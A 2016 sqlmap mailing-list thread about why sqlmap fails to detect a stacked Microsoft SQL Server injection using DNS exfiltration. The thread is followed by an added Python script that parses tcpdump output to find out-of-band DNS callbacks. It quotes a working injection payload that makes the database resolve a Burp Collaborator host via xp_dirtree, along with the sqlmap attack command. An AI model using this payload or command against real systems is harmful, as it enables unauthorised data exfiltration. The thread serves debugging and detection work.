As said, there should be at least one other SQLi technique available. In
your case there is NONE. sqlmap will not blindly use dns-exfil if at least
one other technique worked.
Bye
On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@hotmail.com> wrote:
> Thanks, that's good advice. And I probably should post a little more
> detail on what I'm running here so others can see it as well.
>
>
> Here's the command executing:
>
>
> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p
> ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=
> dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os
> "Windows" --threads 1
> ___
> __H__
> ___ ___[.]_____ ___ ___ {1.0.12#stable}
> |_ -| . [)] | .'| . |
> |___|_ [']_|_|_|__,| _|
> |_|V |_| http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 16:56:14
>
> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
> [16:56:14] [INFO] setting up DNS server instance
> custom injection marking character ('*') found in option
> '--headers/--user-agent/--referer/--cookie'. Do you want to process it?
> [Y/n/q] n
> [16:56:16] [INFO] testing connection to the target URL
> [16:56:18] [INFO] testing if the target URL is stable
> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page
> comparison on a sequence matcher. If no dynamic nor injectable parameters
> are detected, or in case of junk results, refer to user's manual paragraph
> 'Page comparison' and provide a string or regular expression to match on
> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter
> 'ProductCategory' might not be injectable
> [16:56:23] [INFO] testing for SQL injection on GET parameter
> 'ProductCategory'
> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
> WHERE or HAVING clause (IN)'
> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries
> (comment)'
> [16:56:39] [WARNING] time-based comparison requires larger statistical
> model, please wait......... (done)
> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind
> (IF)'
> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be
> injectable
> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable.
> Try to increase '--level'/'--risk' values to perform more tests. Also, you
> can try to rerun by providing either a valid value for option '--string'
> (or '--regexp'). If you suspect that there is some kind of protection
> mechanism involved (e.g. WAF) maybe you could retry with an option
> '--tamper' (e.g. '--tamper=space2comment')
> [16:58:03] [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 98 times
>
> [*] shutting down at 16:58:03
>
>
>
> And then, my capture results for DNS traffic:
>
>
> root@bass:~# tcpdump -n -i eth0 udp port 53
> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A?
> www.testsite.org. (30)
> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA?
> www.testsite.org. (30)
> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A
> 173.213.231.200 (46)
> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A?
> www.testsite.org. (30)
> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA?
> www.testsite.org. (30)
> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A
> 173.213.231.200 (46)
> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A?
> www.testsite.org. (30)
> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA?
> www.testsite.org. (30)
> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A
> 173.213.231.200 (46)
> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A?
> www.testsite.org. (30)
> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA?
> www.testsite.org. (30)
> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A
> 173.213.231.200 (46)
> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A?
> www.testsite.org. (30)
> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA?
> www.testsite.org. (30)
> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A
> 173.213.231.200 (46)
> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>
>
> It doesn't seem like an injection pattern is being tried that is getting
> the DNS exfiltration to occur... or else I'm doing something else wrong.
>
>
> Thanks,
>
> V
>
> ------------------------------
> *From:* Miroslav Stampar <miroslav.stam...@gmail.com>
> *Sent:* Monday, December 19, 2016 4:10 PM
> *To:* Mark M.
> *Cc:* sqlmap-users@lists.sourceforge.net
> *Subject:* Re: [sqlmap-users] Sqlmap/DNS exfil
>
> I would suggest you run Wireshark or similar when running with
> --dns-domain to properly debug what is going on. There could really be lots
> of problems before you fine-tune it (e.g. another service running on :53).
>
> About "forcing" sqlmap to use dns-exfil: it will always at least
> try to test it at the start of a run (if another injection technique is
> available). Also, it will prefer other, "faster" techniques (ERROR and
> UNION) over dns-exfil. However, there is a hidden switch "--force-dns"
> which will force the usage of dns-exfil even if ERROR/UNION are available.
>
> As said, the best advice I can give you is to run Wireshark during
> the run and really see what is going on.
>
> Bye
>
> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@hotmail.com> wrote:
>
>> I have a situation where Burp has detected the following DNS exfiltration
>> injection for a query parameter in a web app:
>>
>>
>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%
>> 20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9ux
>> lo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.d
>> bo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>>
>>
>> To make that a little easier to read, the injected value is:
>>
>>
>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvp
>> ngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree
>> @q;--
>>
>>
>> I've modified the domain and verified that I receive the DNS requests on
>> my local DNS server (the domain which I provide to sqlmap using the
>> --dns-domain=xxx option) when the injection is manually sent to the page.
>> The problem is, when I pass the request to sqlmap it's not detecting that
>> there's an injection at all. I've provided the OS/DBMS and --level 5, but
>> still no dice. I'm using sqlmap v1.0.12#stable.
>>
>>
>> Since I've gotten many other injections to work in the past, I believe
>> that I'm using sqlmap properly (formatting my request in a file
>> appropriately, specifying the correct parameter to test, etc.). However, it
>> surprised me that what appeared to be a fairly straightforward stacked SQL
>> injection would slip by all of sqlmap's tests. Is there a way to force
>> sqlmap to try DNS exfiltration injections despite no other injection
>> technique succeeding?
>>
>>
>> Thanks
>>
>> V
>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Developer Access Program for Intel Xeon Phi Processors
>> Access to Intel Xeon Phi processor-based developer platforms.
>> With one year of Intel Parallel Studio XE.
>> Training and support from Colfax.
>> Order your platform today.http://sdm.link/intel
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
Miroslav Stampar
http://about.me/stamparm
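The debugging step recommended in this thread (watch port 53 while sqlmap runs) is much easier to act on once the capture is reduced to a list of DNS questions and where each one was sent. The script below is an added example, not part of this thread and not sqlmap's own code. It parses `tcpdump -n udp port 53` output in the layout shown above. The first five sample lines are copied from the capture in the thread; the last line is a constructed illustration of what a callback arriving at the listener would look like (the 40-character label, the resolver address 192.0.2.53 and the packet length are made up). The `long_random_label` heuristic is my own assumption, not something sqlmap or tcpdump does.

```python
import re
from collections import Counter

# Matches a DNS *question* line as printed by `tcpdump -n udp port 53`.
# Response lines ("22969 1/0/0 A ...") deliberately do not match: when
# checking whether an out-of-band lookup ever happened, only questions matter.
QUERY_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP "
    r"(?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
    r"(?P<txid>\d+)[+%$]* (?P<qtype>[A-Z0-9]+)\? (?P<qname>\S+) \(\d+\)$"
)

# Constructed sample: lines 1-5 mirror the capture quoted in the thread,
# line 6 is an invented callback to the listener (label, resolver IP, length are made up).
SAMPLE_CAPTURE = """\
16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)
16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org. (30)
16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)
16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? www.testsite.org. (30)
16:57:02.118844 IP 192.0.2.53.41873 > 97.87.91.210.53: 31337+ A? 4f2a9c1d7e8b3a6c5d0e9f1a2b3c4d5e6f7a8b9c.dns.lanternsec.com. (76)
"""


def parse_dns_queries(lines):
    """Return one dict per DNS question found; non-matching lines (responses, headers) are skipped."""
    queries = []
    for line in lines:
        m = QUERY_RE.match(line.strip())
        if not m:
            continue
        q = m.groupdict()
        q["qname"] = q["qname"].rstrip(".").lower()  # drop the trailing root dot
        queries.append(q)
    return queries


def queries_under(queries, domain):
    """Questions for `domain` itself or any name below it, i.e. lookups that would
    reach the authoritative server for the --dns-domain zone."""
    domain = domain.rstrip(".").lower()
    return [q for q in queries if q["qname"] == domain or q["qname"].endswith("." + domain)]


def inbound_to_listener(queries, listener_ip):
    """Questions addressed to our own host on port 53 - the only traffic a local
    DNS listener (such as the one sqlmap starts) can ever observe."""
    return [q for q in queries if q["dst"] == listener_ip and q["dport"] == "53"]


def long_random_label(qname, min_len=24):
    """Heuristic (assumption, not from the thread): an out-of-band callback name
    carries a long leftmost label mixing letters and digits. 'www' never qualifies."""
    label = qname.split(".")[0]
    return (len(label) >= min_len
            and any(c.isdigit() for c in label)
            and any(c.isalpha() for c in label))


def diagnose(capture_text, exfil_domain, listener_ip):
    """Summarise a capture: how many questions, which names, how many reached the
    listener, which fell under the expected domain, and which look like random labels."""
    queries = parse_dns_queries(capture_text.splitlines())
    return {
        "questions_total": len(queries),
        "names_seen": Counter(q["qname"] for q in queries),
        "to_listener": len(inbound_to_listener(queries, listener_ip)),
        "exfil_domain_hits": [q["qname"] for q in queries_under(queries, exfil_domain)],
        "random_label_names": sorted({q["qname"] for q in queries if long_random_label(q["qname"])}),
    }


if __name__ == "__main__":
    # Listener IP and --dns-domain taken from the thread; the capture host is 97.87.91.210.
    report = diagnose(SAMPLE_CAPTURE, "dns.lanternsec.com", "97.87.91.210")
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run against the thread's own capture (the first five lines only), every question is the scanner's A/AAAA lookup of www.testsite.org sent to 8.8.8.8 and nothing at all is addressed to port 53 on the listener, which is the concrete evidence that the injected statement never produced a lookup reaching 97.87.91.210: either the payload did not execute or the target's resolver cannot reach the listener. For a defender the same parser, pointed at a database server's outbound DNS, surfaces exactly the signature an xp_dirtree-style callback leaves on the wire: a long, high-entropy leftmost label under a domain the server has no business resolving.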